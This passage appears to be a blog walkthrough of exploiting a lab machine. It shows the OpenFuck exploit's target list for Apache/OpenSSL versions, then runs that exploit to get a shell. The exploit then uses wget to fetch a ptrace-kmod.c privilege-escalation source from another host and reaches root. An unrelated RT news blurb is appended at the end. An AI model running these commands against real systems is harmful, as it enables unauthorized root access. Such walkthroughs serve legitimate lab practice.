0x23 - FreeBSD (apache-1.3.14)
0x24 - FreeBSD (apache-1.3.17_1)
0x25 - FreeBSD (apache-1.3.19)
0x26 - FreeBSD (apache-1.3.19_1)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x2b - FreeBSD (apache-1.3.22)
0x2c - FreeBSD (apache-1.3.22_7)
0x2d - FreeBSD (apache_fp-1.3.23)
0x2e - FreeBSD (apache-1.3.24_7)
0x2f - FreeBSD (apache-1.3.24+2.8.8)
0x30 - FreeBSD 4.6.2-Release-p6 (apache-1.3.26)
0x31 - FreeBSD 4.6-Realease (apache-1.3.26)
0x32 - FreeBSD (apache-1.3.27)
0x33 - Gentoo Linux (apache-1.3.24-r2)
0x34 - Linux Generic (apache-1.3.14)
0x35 - Mandrake Linux X.x (apache-1.3.22-10.1mdk)
0x36 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x37 - Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)
0x38 - Mandrake Linux 7.2 (apache-1.3.14-2mdk)
0x39 - Mandrake Linux 7.2 (apache-1.3.14) 2
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3c - Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)
0x3d - Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)
0x3e - Mandrake Linux 8.0 (apache-1.3.19-3)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x40 - Mandrake Linux 8.2 (apache-1.3.23-4)
0x41 - Mandrake Linux 8.2 #2 (apache-1.3.23-4)
0x42 - Mandrake Linux 8.2 (apache-1.3.24)
0x43 - Mandrake Linux 9 (apache-1.3.26)
0x44 - RedHat Linux ?.? GENERIC (apache-1.3.12-1)
0x45 - RedHat Linux TEST1 (apache-1.3.12-1)
0x46 - RedHat Linux TEST2 (apache-1.3.12-1)
0x47 - RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)
0x48 - RedHat Linux 4.2 (apache-1.1.3-3)
0x49 - RedHat Linux 5.0 (apache-1.2.4-4)
0x4a - RedHat Linux 5.1-Update (apache-1.2.6)
0x4b - RedHat Linux 5.1 (apache-1.2.6-4)
0x4c - RedHat Linux 5.2 (apache-1.3.3-1)
0x4d - RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)
0x4e - RedHat Linux 6.0 (apache-1.3.6-7)
0x4f - RedHat Linux 6.0 (apache-1.3.6-7)
0x50 - RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)
0x51 - RedHat Linux 6.0 Update (apache-1.3.24)
0x52 - RedHat Linux 6.1 (apache-1.3.9-4)1
0x53 - RedHat Linux 6.1 (apache-1.3.9-4)2
0x54 - RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)
0x55 - RedHat Linux 6.1-fp2000 (apache-1.3.26)
0x56 - RedHat Linux 6.2 (apache-1.3.12-2)1
0x57 - RedHat Linux 6.2 (apache-1.3.12-2)2
0x58 - RedHat Linux 6.2 mod(apache-1.3.12-2)3
0x59 - RedHat Linux 6.2 update (apache-1.3.22-5.6)1
0x5a - RedHat Linux 6.2-Update (apache-1.3.22-5.6)2
0x5b - Redhat Linux 7.x (apache-1.3.22)
0x5c - RedHat Linux 7.x (apache-1.3.26-1)
0x5d - RedHat Linux 7.x (apache-1.3.27)
0x5e - RedHat Linux 7.0 (apache-1.3.12-25)1
0x5f - RedHat Linux 7.0 (apache-1.3.12-25)2
0x60 - RedHat Linux 7.0 (apache-1.3.14-2)
0x61 - RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)
0x62 - RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)
0x63 - RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)
0x64 - RedHat Linux 7.1 (apache-1.3.19-5)1
0x65 - RedHat Linux 7.1 (apache-1.3.19-5)2
0x66 - RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)
0x67 - RedHat Linux 7.1-Update (1.3.22-5.7.1)
0x68 - RedHat Linux 7.1 (apache-1.3.22-src)
0x69 - RedHat Linux 7.1-Update (1.3.27-1.7.1)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)
0x6d - RedHat Linux 7.2 (apache-1.3.24)
0x6e - RedHat Linux 7.2 (apache-1.3.26)
0x6f - RedHat Linux 7.2 (apache-1.3.26-snc)
0x70 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)1
0x71 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)2
0x72 - RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)
0x73 - RedHat Linux 7.3 (apache-1.3.23-11)1
0x74 - RedHat Linux 7.3 (apache-1.3.23-11)2
0x75 - RedHat Linux 7.3 (apache-1.3.27)
0x76 - RedHat Linux 8.0 (apache-1.3.27)
0x77 - RedHat Linux 8.0-second (apache-1.3.27)
0x78 - RedHat Linux 8.0 (apache-2.0.40)
0x79 - Slackware Linux 4.0 (apache-1.3.6)
0x7a - Slackware Linux 7.0 (apache-1.3.9)
0x7b - Slackware Linux 7.0 (apache-1.3.26)
0x7c - Slackware 7.0 (apache-1.3.26)2
0x7d - Slackware Linux 7.1 (apache-1.3.12)
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x7f - Slackware Linux 8.1 (apache-1.3.24)
0x80 - Slackware Linux 8.1 (apache-1.3.26)
0x81 - Slackware Linux 8.1-stable (apache-1.3.26)
0x82 - Slackware Linux (apache-1.3.27)
0x83 - SuSE Linux 7.0 (apache-1.3.12)
0x84 - SuSE Linux 7.1 (apache-1.3.17)
0x85 - SuSE Linux 7.2 (apache-1.3.19)
0x86 - SuSE Linux 7.3 (apache-1.3.20)
0x87 - SuSE Linux 8.0 (apache-1.3.23)
0x88 - SUSE Linux 8.0 (apache-1.3.23-120)
0x89 - SuSE Linux 8.0 (apache-1.3.23-137)
0x8a - Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)

Looks like we need to do a little more. We know we have RedHat and we know it's Apache 1.3.20, so it looks like our options are

0x6a or 0x6b

Let's try the first one


root@kali:~# ./openfuck 0x6a 172.16.2.13 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80ffe70
Ready to send shellcode
Spawning shell...
Good Bye!

Doesn't look like it, so let's try the other one


root@kali:~# ./openfuck 0x6b 172.16.2.13 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
ace-kmod.c; rm ptrace-kmod.c; ./p; wget 172.16.2.21/ptrace-kmod.c; gcc -o p ptr
--15:08:48-- http://172.16.2.21/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 172.16.2.21:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 4,128 [text/x-csrc]

0K .... 100% @ 3.94 MB/s

15:08:48 (3.94 MB/s) - `ptrace-kmod.c' saved [4128/4128]

/usr/bin/ld: cannot open output file p: Permission denied
collect2: ld returned 1 exit status
pwd
/tmp
whoami
root

We have root! Also, it might take a couple of runs of OpenFuck before it works, but it will work if all is set up correctly. In another post I'll go over troubleshooting for OpenFuck, since I had a hard time after doing a dist-upgrade of Kali. Hope y'all enjoy these walkthroughs.

In the news: "The US has become a real gulag, where we live with a boot on our face" - RT en Español - Noticias internacionales


RT en Español - Noticias internacionales

"The US has become a real gulag, where we live with a boot on our face"
In this episode of 'Keiser Report', Max Keiser and Stacy Herbert discuss how privacy on the Internet was done away with for a miserable million dollars. In the second part of the broadcast Max continues his interview with Jaromil, of Dyne.org, about the ...
